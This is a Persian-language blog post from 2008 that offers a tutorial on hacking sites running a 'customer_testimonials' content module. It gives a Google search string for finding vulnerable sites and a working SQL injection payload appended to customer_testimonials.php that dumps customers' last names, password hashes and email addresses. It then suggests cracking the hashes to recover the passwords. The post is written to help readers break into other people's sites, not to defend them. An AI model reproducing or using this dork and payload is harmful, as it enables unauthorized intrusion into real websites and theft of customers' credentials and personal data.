[ بستن ]

سیستم وبلاگ پارسی باکسسیستم مدیریت فروش هاست و دامینسایت شخصی محسن داوری برنامه نویس PHPهماهنگی با موتورهای جستجو , رنکینگ گوگل , google pagerank , page rank , seo , search

  جهان اطلاعات  
     
 
منوی اصلی

بخش ها

نویسندگان

آمار
بازدید امروز : 104
بازدید دیروز : 182 ‍
بازدید این ماه : 424
بازدید امسال : 12690
بازدید کل : 19733


 
سخن روز


هک پسورد اعضای سایت های customer_testimonials

 

امروز براتون به آموزش جالب از سری آموزش های هک سایت به وسیله باگ های منتشر شده رو  گذاشتم!

این آموزش از این قرار است که شما می توانید از طریق آسیپ پذیری موجو در سایت های که دارای مدیریت محتوای (customer_testimonials) هستند به هک یوزر و پسورد کاربران این قبیل سایت ها بپردازید!

خوب شما برای هک این سایت ها ابتدا عبارت زیر را در گوگل جستجو کنید:

customer_testimonials.php

حال پس ار یافتن سایت های مورد نظر فقط کافی است که عبارت زیر را به ادامه نام سایت اضافه کنید:

customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat
(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),
4,5,6,7,8+from+customers/*

حال مشاهده خواهید کرد که پسورد های کاربران سایت را به صورت Encode شده در اختیار شما قرار داده می شود و شما می توانید به وسیله یک برنامه Encode پسورد اصلی را به دست آورید!

نقل قول از پسورد 35


آموزش هک سایت,هک پسورد اعضای سايت های customer_testimonials

نوشته شده توسط علیرضا   | نظرات [0] | لینک به این مطلب | | Bookmark and Share


 
لینک ها


--------------------
AddThis Feed Button


--------------------
 
Copy Right 2008 Worldit. ParsiBox.com ( Designed By Alireza Master Design )